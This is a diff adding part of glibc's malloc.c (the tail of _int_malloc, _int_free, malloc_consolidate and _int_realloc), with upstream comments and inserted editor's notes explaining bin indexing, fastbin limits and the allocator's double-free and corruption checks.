+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs.  And the programs in which
+     it is called frequently otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (atomic_load_relaxed (&av->have_fastchunks))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is an exact fit, or, if this is a small request, the chunk is the remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          size = chunksize (victim);
+          mchunkptr next = chunk_at_offset (victim, size);
+
+          if (__glibc_unlikely (size <= 2 * SIZE_SZ)
+              || __glibc_unlikely (size > av->system_mem))
+            malloc_printerr ("malloc(): invalid size (unsorted)");
+          if (__glibc_unlikely (chunksize_nomask (next) < 2 * SIZE_SZ)
+              || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
+            malloc_printerr ("malloc(): invalid next size (unsorted)");
+          if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
+            malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
+          if (__glibc_unlikely (bck->fd != victim)
+              || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
+            malloc_printerr ("malloc(): unsorted double linked list corrupted");
+          if (__glibc_unlikely (prev_inuse (next)))
+            malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
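+          /* Illustrative example: with nb == 0x40 and a lone 0x200-byte
+             last remainder in the unsorted bin, the leading 0x40 bytes are
+             returned and a new 0x1c0 remainder is relinked as the only
+             unsorted chunk and recorded as av->last_remainder.  */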
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          if (__glibc_unlikely (bck->fd != victim))
+            malloc_printerr ("malloc(): corrupted unsorted chunks 3");
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
+                            malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                      if (bck->fd != fwd)
+                        malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
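+
+      /*
+         Illustration (editor's sketch, not upstream text): the binmap is a
+         small bitmap over all the bins, BINMAPSIZE words of 1<<BINMAPSHIFT
+         bits each.  With the usual NBINS == 128 and BINMAPSHIFT == 5, bin
+         70 lives in word 70 >> 5 == 2 and is tested with the bit
+         1U << (70 & 31) == 0x40, so an entire block of 32 empty bins is
+         skipped with a single word comparison.
+       */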
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
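+
+      /*
+         Illustration (editor's sketch, not upstream text): on a fresh heap
+         with empty bins, a request like malloc(0x18) ends up here and
+         simply carves a 0x20-byte chunk off av->top; the bundled
+         demo_top_chunk.c demonstrates this case.
+       */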
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if (__glibc_unlikely (size > av->system_mem))
+        malloc_printerr ("malloc(): corrupted top size");
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (atomic_load_relaxed (&av->have_fastchunks))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wraps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    malloc_printerr ("free(): invalid pointer");
+  /* We know that each chunk is at least MINSIZE bytes in size and a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    malloc_printerr ("free(): invalid size");
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+    if (tcache != NULL && tc_idx < mp_.tcache_bins)
+      {
+	/* Check to see if it's already in the tcache.  */
+	tcache_entry *e = (tcache_entry *) chunk2mem (p);
+
+	/* This test succeeds on double free.  However, we don't 100%
+	   trust it (it also matches random payload data at a 1 in
+	   2^<size_t> chance), so verify it's not an unlikely
+	   coincidence before aborting.  */
+	if (__glibc_unlikely (e->key == tcache))
+	  {
+	    tcache_entry *tmp;
+	    LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+	    for (tmp = tcache->entries[tc_idx];
+		 tmp;
+		 tmp = tmp->next)
+	      if (tmp == e)
+		malloc_printerr ("free(): double free detected in tcache 2");
+	    /* If we get here, it was a coincidence.  We've wasted a
+	       few cycles, but don't abort.  */
+	  }
+
+	if (tcache->counts[tc_idx] < mp_.tcache_count)
+	  {
+	    tcache_put (p, tc_idx);
+	    return;
+	  }
+      }
+  }
+#endif
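+
+  /*
+    Editor's note (not upstream text): for a tcache-sized chunk, the key
+    check above is what turns a naive
+
+      free(p);
+      free(p);
+
+    into the "free(): double free detected in tcache 2" abort on
+    tcache-enabled builds; the key is only cleared again when the chunk
+    leaves the tcache through tcache_get ().
+  */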
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
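+
+  /*
+    Editor's note (not upstream text): with the default tunables on a
+    64-bit build, get_max_fast () is 0x80, so chunks of at most 0x80
+    bytes -- requests of at most 0x78 bytes -- take this fastbin path,
+    assuming the tcache above did not already absorb the chunk.
+  */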
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	bool fail = true;
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might result in a false positive.  Redo the test after
+	   getting the lock.  */
+	if (!have_lock)
+	  {
+	    __libc_lock_lock (av->mutex);
+	    fail = (chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
+	    __libc_lock_unlock (av->mutex);
+	  }
+
+	if (fail)
+	  malloc_printerr ("free(): invalid next size (fast)");
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    atomic_store_relaxed (&av->have_fastchunks, true);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+
+    if (SINGLE_THREAD_P)
+      {
+	/* Check that the top of the bin is not the record we are going to
+	   add (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  malloc_printerr ("double free or corruption (fasttop)");
+	p->fd = old;
+	*fb = p;
+      }
+    else
+      do
+	{
+	  /* Check that the top of the bin is not the record we are going to
+	     add (i.e., double free).  */
+	  if (__builtin_expect (old == p, 0))
+	    malloc_printerr ("double free or corruption (fasttop)");
+	  p->fd = old2 = old;
+	}
+      while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
+	     != old2);
+
+    /* Check that size of fastbin chunk at the top is the same as
+       size of the chunk that we are adding.  We can dereference OLD
+       only if we have the lock, otherwise it might have already been
+       allocated again.  */
+    if (have_lock && old != NULL
+	&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
+      malloc_printerr ("invalid fastbin entry (free)");
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+
+    /* If we're single-threaded, don't lock the arena.  */
+    if (SINGLE_THREAD_P)
+      have_lock = true;
+
+    if (!have_lock)
+      __libc_lock_lock (av->mutex);
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      malloc_printerr ("double free or corruption (top)");
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+	malloc_printerr ("double free or corruption (out)");
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      malloc_printerr ("double free or corruption (!prev)");
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      malloc_printerr ("free(): invalid next size (normal)");
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      if (__glibc_unlikely (chunksize(p) != prevsize))
+        malloc_printerr ("corrupted size vs. prev_size while consolidating");
+      unlink_chunk (av, p);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink_chunk (av, nextchunk);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	malloc_printerr ("free(): corrupted unsorted chunks");
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
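+
+    /*
+      Editor's note (not upstream text): FASTBIN_CONSOLIDATION_THRESHOLD is
+      64K in this version, so only a free that yields a coalesced chunk of
+      at least 0x10000 bytes triggers this consolidate-and-trim pass.
+    */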
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (atomic_load_relaxed (&av->have_fastchunks))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (!have_lock)
+      __libc_lock_unlock (av->mutex);
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  unsorted_bin = unsorted_chunks(av);
+
+  /*
+    Remove each chunk from fast bin and consolidate it, placing it
+    then in unsorted bin. Among other reasons for doing this,
+    placing in unsorted bin avoids needing to calculate actual bins
+    until malloc is sure that chunks aren't immediately going to be
+    reused anyway.
+  */
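+
+  /*
+    Editor's note (not upstream text): fastbin frees deliberately leave the
+    next chunk's PREV_INUSE bit set, so neighbouring free chunks are only
+    discovered and merged here -- e.g. two adjacent 0x30 fastbin chunks end
+    up as a single 0x60 chunk in the unsorted bin (or folded into top if
+    they border it) by the time this pass finishes.
+  */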
+
+  maxfb = &fastbin (av, NFASTBINS - 1);
+  fb = &fastbin (av, 0);
+  do {
+    p = atomic_exchange_acq (fb, NULL);
+    if (p != 0) {
+      do {
+	{
+	  unsigned int idx = fastbin_index (chunksize (p));
+	  if ((&fastbin (av, idx)) != fb)
+	    malloc_printerr ("malloc_consolidate(): invalid chunk size");
+	}
+
+	check_inuse_chunk(av, p);
+	nextp = p->fd;
+
+	/* Slightly streamlined version of consolidation code in free() */
+	size = chunksize (p);
+	nextchunk = chunk_at_offset(p, size);
+	nextsize = chunksize(nextchunk);
+
+	if (!prev_inuse(p)) {
+	  prevsize = prev_size (p);
+	  size += prevsize;
+	  p = chunk_at_offset(p, -((long) prevsize));
+	  if (__glibc_unlikely (chunksize(p) != prevsize))
+	    malloc_printerr ("corrupted size vs. prev_size in fastbins");
+	  unlink_chunk (av, p);
+	}
+
+	if (nextchunk != av->top) {
+	  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	  if (!nextinuse) {
+	    size += nextsize;
+	    unlink_chunk (av, nextchunk);
+	  } else
+	    clear_inuse_bit_at_offset(nextchunk, 0);
+
+	  first_unsorted = unsorted_bin->fd;
+	  unsorted_bin->fd = p;
+	  first_unsorted->bk = p;
+
+	  if (!in_smallbin_range (size)) {
+	    p->fd_nextsize = NULL;
+	    p->bk_nextsize = NULL;
+	  }
+
+	  set_head(p, size | PREV_INUSE);
+	  p->bk = unsorted_bin;
+	  p->fd = first_unsorted;
+	  set_foot(p, size);
+	}
+
+	else {
+	  size += nextsize;
+	  set_head(p, size | PREV_INUSE);
+	  av->top = p;
+	}
+
+      } while ( (p = nextp) != 0);
+
+    }
+  } while (fb++ != maxfb);
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid old size");
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid next size");
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink_chunk (av, next);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+	      memcpy (newmem, chunk2mem (oldp), oldsize - SIZE_SZ);
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
